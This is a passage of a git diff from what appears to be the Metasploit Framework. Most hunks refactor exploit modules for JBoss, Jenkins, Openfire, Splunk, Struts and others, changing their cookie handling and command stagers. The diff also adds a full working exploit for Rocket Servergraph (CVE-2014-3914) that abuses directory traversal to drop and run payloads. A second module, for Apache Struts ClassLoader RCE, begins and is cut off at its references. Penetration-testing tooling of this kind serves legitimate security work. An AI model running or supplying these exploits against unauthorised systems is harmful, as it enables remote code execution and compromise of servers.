-      'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"),
-      'cookie' => @cookie
+      'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'typeId' => '10003'
+      }
     })
 
     if not res or res.code != 200
@@ -241,7 +247,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 
-
   def exploit
 
     # login
@@ -275,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # send payload
     case @my_target['Platform']
     when 'win'
-      print_status("#{peer} - Sending VBS stager...")
+      print_status("#{peer} - Sending command stager...")
       execute_cmdstager({:linemax => 2049})
     when 'unix'
       print_status("#{peer} - Sending UNIX payload...")
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index 1ef454ed64..77b3a3b126 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -315,9 +315,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'    => path
       }, 20)
 
+    if (res) && (res.code == 401)
+      fail_with(Failure::NoAccess,"Unable to bypass authentication.  Try changing the verb to HEAD to exploit CVE-2010-0738.")
+    end
+
     if (not res) or (res.code != 200)
-      print_error("Failed: Error requesting #{path}")
-      return nil
+      fail_with(Failure::Unknown,"Failed: Error requesting #{path}")
     end
 
     res
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
index 3c7bf20530..d41a0921bd 100644
--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -33,10 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
         ],
       'Platform'  => %w{ win linux unix },
-      'Targets'		=>
+      'Targets'   =>
         [
-          ['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
-          ['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
+          ['Linux',    {'Arch'  => ARCH_X86, 'Platform' => 'linux' }],
           ['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
         ],
       'DisclosureDate' => 'Jan 18 2013',
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
         fail_with(Failure::NoAccess, 'login failed')
       end
-      sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
+      sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
       @cookie = "#{sessionid}"
     else
       print_status('No authentication required, skipping login...')
@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     case target['Platform']
     when 'win'
-      print_status("#{rhost}:#{rport} - Sending VBS stager...")
+      print_status("#{rhost}:#{rport} - Sending command stager...")
       execute_cmdstager({:linemax => 2049})
     when 'unix'
       print_status("#{rhost}:#{rport} - Sending payload...")
diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
index 154c2917ab..0ab2fcd253 100644
--- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
+++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
@@ -97,4 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote
 
     handler
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
index d4cadae1c7..900c5a6418 100644
--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/
       print_good("#{peer} - Login successful")
       session = $1
     else
diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
index 5b993fb37f..48ca16b5c4 100644
--- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb
+++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => %w{ win unix },
       'Targets'        =>
         [
-          [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'}  ],
+          [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'}  ],
           [ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
         ],
       'DisclosureDate' => 'Dec 06 2012'))
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     case target['Platform']
     when 'win'
-      print_status("#{rhost}:#{rport} - Sending VBS stager...")
+      print_status("#{rhost}:#{rport} - Sending command stager...")
       execute_cmdstager({:linemax=>500})
 
     when 'unix'
diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb
index bc346979d8..874e681659 100644
--- a/modules/exploits/multi/http/openfire_auth_bypass.rb
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote
     data << "\r\n--#{boundary}--"
 
     res = send_request_cgi({
-      'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
+      'uri'     => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
       'method'  => 'POST',
       'data'    => data,
-      'headers' =>
-        {
-          'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
-          'Content-Length' => data.length,
-          'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
-        }
+      'headers' => {
+        'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
+        'Content-Length' => data.length,
+        'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+      },
+      'vars_get' => {
+        'uploadplugin' => nil
+      }
     })
 
 
@@ -199,11 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
     if datastore['REMOVE_PLUGIN']
       print_status("Deleting plugin #{plugin_name} from the server")
       res = send_request_cgi({
-        'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
-        'headers' =>
-          {
-            'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
-          }
+        'uri'     => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
+        'headers' => {
+          'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+        },
+        'vars_get' => {
+          'deleteplugin' => plugin_name.downcase
+        }
       })
       if not res
         print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index 61a67e8e40..b115e056f0 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote
         max.times { chars << rand(string.length)}
       end
     end
-    chars.uniq.sort.reverse.each{|index|  string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
+    chars.uniq.sort.reverse.each{|index|  string[index] = Rex::Text.uri_encode(string[index,1], "hex-noslashes")}
     string
   end
 
diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
index a885cb3901..6854cd78bb 100644
--- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     # If we don't get a cookie, bail!
-    if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
+    if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/
       cookie = $1
       vprint_status("#{peer} - Found cookie: #{cookie}")
     else
diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
index c6eeac426b..fb087c952d 100644
--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -79,19 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri' => uri,
       }, 3)
 
-    if (res.nil? or not res.headers['Set-Cookie'])
+    if res.nil? or res.get_cookies.empty?
       print_error("Could not generate a valid session")
       return
     end
 
-    return res.headers['Set-Cookie']
-  end
-
-  def cleanup
-    # We may not be using php/exe again, so clear the CMD option
-    if datastore['CMD']
-      datastore['CMD'] = nil
-    end
+    return res.get_cookies
   end
 
   def exploit
diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb
index 0478b23dd5..c9f5931858 100644
--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : ''
+    cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : ''
     return {} if cookie.empty?
     cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
 
diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 46751d2f1f..7803dd5414 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -233,8 +233,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => datastore['TARGETURI'] || "/",
       'method' => datastore['HTTP_METHOD'],
     }, 25)
-    if res && res.headers['Set-Cookie']
-      match = res.headers['Set-Cookie'].match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
+    if res && !res.get_cookies.empty?
+      match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
     end
 
     if match
diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb
new file mode 100644
index 0000000000..88b2c04a08
--- /dev/null
+++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb
@@ -0,0 +1,348 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Rocket Servergraph Admin Center fileRequestor Remote Code Execution',
+      'Description' => %q{
+        This module abuses several directory traversal flaws in Rocket Servergraph Admin
+        Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet,
+        allowing a remote attacker to write arbitrary files and execute commands with
+        administrative privileges. This module has been tested successfully on Rocket
+        ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu
+        12.04 64 bits.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-3914'],
+          ['ZDI', '14-161'],
+          ['ZDI', '14-162'],
+          ['BID', '67779']
+        ],
+      'Privileged'  => true,
+      'Platform'    => %w{ linux unix win },
+      'Arch'        => [ARCH_X86, ARCH_X86_64, ARCH_CMD],
+      'Payload'     =>
+        {
+          'Space'       => 8192, # it's writing a file, so just a long enough value
+          'DisableNops' => true
+          #'BadChars'   => (0x80..0xff).to_a.pack("C*") # Doesn't apply
+        },
+      'Targets'     =>
+        [
+          [ 'Linux (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Linux (CMD Payload)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [ 'Windows / VB Script',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Windows CMD',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 30 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(8888)
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('TRAVERSAL_DEPTH', [ true, 'Traversal depth to hit the root folder', 20]),
+        OptString.new("WINDIR", [ true, 'The Windows Directory name', 'WINDOWS' ]),
+        OptString.new("TEMP_DIR", [ false, 'A directory where we can write files' ])
+      ], self.class)
+
+  end
+
+  def check
+    os = get_os
+
+    if os.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    os = get_os
+
+    if os == 'win' && target.name =~ /Linux/
+      fail_with(Failure::BadConfig, "#{peer} - Windows system detected, but Linux target selected")
+    elsif os == 'linux' && target.name =~ /Windows/
+      fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected")
+    elsif os.nil?
+      print_warning("#{peer} - Failed to detect remote operating system, trying anyway...")
+    end
+
+    if target.name =~ /Windows.*VB/
+      exploit_windows_vbs
+    elsif target.name =~ /Windows.*CMD/
+      exploit_windows_cmd
+    elsif target.name =~ /Linux.*CMD/
+      exploit_linux_cmd
+    elsif target.name =~ /Linux.*Native/
+      exploit_linux_native
+    end
+  end
+
+  def exploit_windows_vbs
+    traversal = "\\.." * traversal_depth
+    payload_base64 = Rex::Text.encode_base64(generate_payload_exe)
+    temp = temp_dir('win')
+    decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.vbs"
+    encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"
+    exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe"
+
+    print_status("#{peer} - Dropping the encoded payload to filesystem...")
+    write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)
+
+    vbs = generate_decoder_vbs({
+      :temp_dir => "C:#{temp}",
+      :encoded_file_name => encoded_file_name,
+      :exe_file_name => exe_file_name
+    })
+    print_status("#{peer} - Dropping the VBS decoder to filesystem...")
+    write_file("#{traversal}#{temp}#{decoder_file_name}", vbs)
+
+    register_files_for_cleanup("C:#{temp}#{decoder_file_name}")
+    register_files_for_cleanup("C:#{temp}#{encoded_file_name}")
+    register_files_for_cleanup("C:#{temp}#{exe_file_name}")
+    print_status("#{peer} - Executing payload...")
+    execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}")
+  end
+
+
+  def exploit_windows_cmd
+    traversal = "\\.." * traversal_depth
+    execute("#{traversal}\\#{win_dir}\\System32\\cmd.exe /B /C #{payload.encoded}")
+  end
+
+  def exploit_linux_native
+    traversal = "/.." * traversal_depth
+    payload_base64 = Rex::Text.encode_base64(generate_payload_exe)
+    temp = temp_dir('linux')
+    encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"
+    decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh"
+    elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf"
+
+    print_status("#{peer} - Dropping the encoded payload to filesystem...")
+    write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)
+
+    decoder = <<-SH
+#!/bin/sh
+
+base64 --decode #{temp}#{encoded_file_name} > #{temp}#{elf_file_name}
+chmod 777 #{temp}#{elf_file_name}
+#{temp}#{elf_file_name}
+SH
+
+    print_status("#{peer} - Dropping the decoder to filesystem...")
+    write_file("#{traversal}#{temp}#{decoder_file_name}", decoder)
+
+    register_files_for_cleanup("#{temp}#{decoder_file_name}")
+    register_files_for_cleanup("#{temp}#{encoded_file_name}")
+    register_files_for_cleanup("#{temp}#{elf_file_name}")
+
+    print_status("#{peer} - Giving execution permissions to the decoder...")
+    execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}")
+
+    print_status("#{peer} - Executing decoder and payload...")
+    execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}")
+  end
+
+  def exploit_linux_cmd
+    temp = temp_dir('linux')
+    elf = rand_text_alpha(4 + rand(4))
+
+    traversal = "/.." * traversal_depth
+    print_status("#{peer} - Dropping payload...")
+    write_file("#{traversal}#{temp}#{elf}", payload.encoded)
+    register_files_for_cleanup("#{temp}#{elf}")
+    print_status("#{peer} - Providing execution permissions...")
+    execute("#{traversal}/bin/chmod 777 #{temp}#{elf}")
+    print_status("#{peer} - Executing payload...")
+    execute("#{traversal}#{temp}#{elf}")
+  end
+
+  def generate_decoder_vbs(opts = {})
+    decoder_path = File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")
+
+    f = File.new(decoder_path, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    decoder.gsub!(/>>decode_stub/, "")
+    decoder.gsub!(/^echo /, "")
+    decoder.gsub!(/ENCODED/, "#{opts[:temp_dir]}#{opts[:encoded_file_name]}")
+    decoder.gsub!(/DECODED/, "#{opts[:temp_dir]}#{opts[:exe_file_name]}")
+
+    decoder
+  end
+
+  def get_os
+    os = nil
+    path = ""
+    hint = rand_text_alpha(3 + rand(4))
+
+    res = send_request(20, "writeDataFile", rand_text_alpha(4 + rand(10)), "/#{hint}/#{hint}")
+
+    if res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\/#{hint}\/#{hint} \(No such file or directory\)/
+      path = $1
+    elsif res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\\#{hint}\\#{hint} \(The system cannot find the path specified\)/
+      path = $1
+    end
+
+    if path =~ /^\//
+      os = 'linux'
+    elsif path =~ /^[a-zA-Z]:\\/
+      os = 'win'
+    end
+
+    os
+  end
+
+  def temp_dir(os)
+    temp = ""
+    case os
+    when 'linux'
+      temp = linux_temp_dir
+    when 'win'
+      temp = win_temp_dir
+    end
+
+    temp
+  end
+
+  def linux_temp_dir
+    dir = "/tmp/"
+
+    if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?
+      dir = datastore['TEMP_DIR']
+    end
+
+    unless dir.start_with?("/")
+      dir = "/#{dir}"
+    end
+
+    unless dir.end_with?("/")
+      dir = "#{dir}/"
+    end
+
+    dir
+  end
+
+  def win_temp_dir
+    dir = "\\#{win_dir}\\Temp\\"
+
+    if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?
+      dir = datastore['TEMP_DIR']
+    end
+
+    dir.gsub!(/\//, "\\")
+    dir.gsub!(/^([A-Za-z]:)?/, "")
+
+    unless dir.start_with?("\\")
+      dir = "\\#{dir}"
+    end
+
+    unless dir.end_with?("\\")
+      dir = "#{dir}\\"
+    end
+
+    dir
+  end
+
+  def win_dir
+    dir = "WINDOWS"
+    if datastore['WINDIR']
+      dir = datastore['WINDIR']
+      dir.gsub!(/\//, "\\")
+      dir.gsub!(/[\\]*$/, "")
+      dir.gsub!(/^([A-Za-z]:)?[\\]*/, "")
+    end
+
+    dir
+  end
+
+  def traversal_depth
+    depth = 20
+
+    if datastore['TRAVERSAL_DEPTH'] && datastore['TRAVERSAL_DEPTH'] > 1
+      depth = datastore['TRAVERSAL_DEPTH']
+    end
+
+    depth
+  end
+
+  def write_file(file_name, contents)
+    res = send_request(20, "writeDataFile", Rex::Text.uri_encode(contents), file_name)
+
+    unless res && res.code == 200 && res.body.to_s =~ /Data successfully writen to file: /
+      fail_with(Failure::Unknown, "#{peer} - Failed to write file... aborting")
+    end
+
+    res
+  end
+
+  def execute(command)
+    res = send_request(1, "run", command)
+
+    res
+  end
+
+  def send_request(timeout, command, query, source = rand_text_alpha(rand(4) + 4))
+    data = "&invoker=#{rand_text_alpha(rand(4) + 4)}"
+    data << "&title=#{rand_text_alpha(rand(4) + 4)}"
+    data << "&params=#{rand_text_alpha(rand(4) + 4)}"
+    data << "&id=#{rand_text_alpha(rand(4) + 4)}"
+    data << "&cmd=#{command}"
+    data << "&source=#{source}"
+    data << "&query=#{query}"
+
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri('/', 'SGPAdmin', 'fileRequest'),
+        'method' => 'POST',
+        'data'   => data
+      }, timeout)
+
+    res
+  end
+
+end
diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb
index 1e2cd51567..d8f6f00de9 100644
--- a/modules/exploits/multi/http/sflog_upload_exec.rb
+++ b/modules/exploits/multi/http/sflog_upload_exec.rb
@@ -86,8 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/
-      return res.headers['Set-Cookie']
+    if res and res.get_cookies.include?('PHPSESSID') and res.body !~ /\<i\>Access denied\!\<\/i\>/
+      return res.get_cookies
     else
       return ''
     end
diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb
index d85302620b..92d4380c43 100644
--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if (res and res.code == 302 and res.headers['Location'] =~ /main.php/)
       print_status("Successfully logged in as #{user}:#{pass}")
 
-      if (res.headers['Set-Cookie'] =~ /SiTsessionID/) and res.headers['Set-Cookie'].split("SiTsessionID")[-1] =~ /=(.*);/
+      if (res.get_cookies =~ /SiTsessionID/) and res.get_cookies.split("SiTsessionID")[-1] =~ /=(.*);/
         session = $1
         print_status("Successfully retrieved cookie: #{session}")
         return session
diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb
index 0be872543b..63f0cf3715 100644
--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'       =>
         [
           'Nikolas Sotiriu', # Vulnerability Discovery
-          'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
+          'Redsadic <julian.vilas[at]gmail.com>', # Metasploit module
           'juan vazquez' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb
index 2725ba5f81..cae9a80878 100644
--- a/modules/exploits/multi/http/splunk_mappy_exec.rb
+++ b/modules/exploits/multi/http/splunk_mappy_exec.rb
@@ -124,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
     uid = ''
     session_id_port =
     session_id = ''
-    if res and res.code == 200 and res.headers['Set-Cookie']
-      res.headers['Set-Cookie'].split(';').each {|c|
+    if res and res.code == 200 and !res.get_cookies.empty?
+      res.get_cookies.split(';').each {|c|
         c.split(',').each {|v|
           if v.split('=')[0] =~ /cval/
             cval = v.split('=')[1]
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       session_id_port = ''
       session_id = ''
-      res.headers['Set-Cookie'].split(';').each {|c|
+      res.get_cookies.split(';').each {|c|
         c.split(',').each {|v|
           if v.split('=')[0] =~ /session_id/
             session_id_port = v.split('=')[0]
diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb
index 0c710b83ac..35e5f85241 100644
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb
+++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb
@@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
     session_id_port =
     session_id = ''
     if res and res.code == 200
-      res.headers['Set-Cookie'].split(';').each {|c|
+      res.get_cookies.split(';').each {|c|
         c.split(',').each {|v|
           if v.split('=')[0] =~ /cval/
             cval = v.split('=')[1]
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       session_id_port = ''
       session_id = ''
-      res.headers['Set-Cookie'].split(';').each {|c|
+      res.get_cookies.split(';').each {|c|
         c.split(',').each {|v|
           if v.split('=')[0] =~ /session_id/
             session_id_port = v.split('=')[0]
diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb
index e5bab5f8eb..dc5a7eeb1f 100644
--- a/modules/exploits/multi/http/spree_search_exec.rb
+++ b/modules/exploits/multi/http/spree_search_exec.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
     res = send_request_raw({
       'uri'     => normalize_uri(datastore['URI']) + "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
       'method'  => 'GET',
diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb
index 1e172296cc..53e698877c 100644
--- a/modules/exploits/multi/http/spree_searchlogic_exec.rb
+++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
 
     urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
     res = send_request_raw({
diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb
index 397b996b79..ad9498cf19 100644
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
           ['Windows Universal',
             {
                 'Arch' => ARCH_X86,
-                'Platform' => 'win'
+                'Platform' => 'win',
+                'CmdStagerFlavor' => 'tftp'
             }
           ],
           ['Linux Universal',
@@ -88,10 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def windows_stager
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
new file mode 100644
index 0000000000..344061f9e5
--- /dev/null
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # It's going to manipulate the Class Loader
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows
+        access to 'class' parameter that is directly mapped to getClass() method and
+        allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary
+        Java code via crafted parameters.
+      },
+      'Author'         =>
+        [
+          'Mark Thomas', # Vulnerability Discovery
+          'Przemyslaw Celej', # Vulnerability Discovery
+          'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-0094'],
+          ['CVE', '2014-0112'],
+          ['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
+          ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
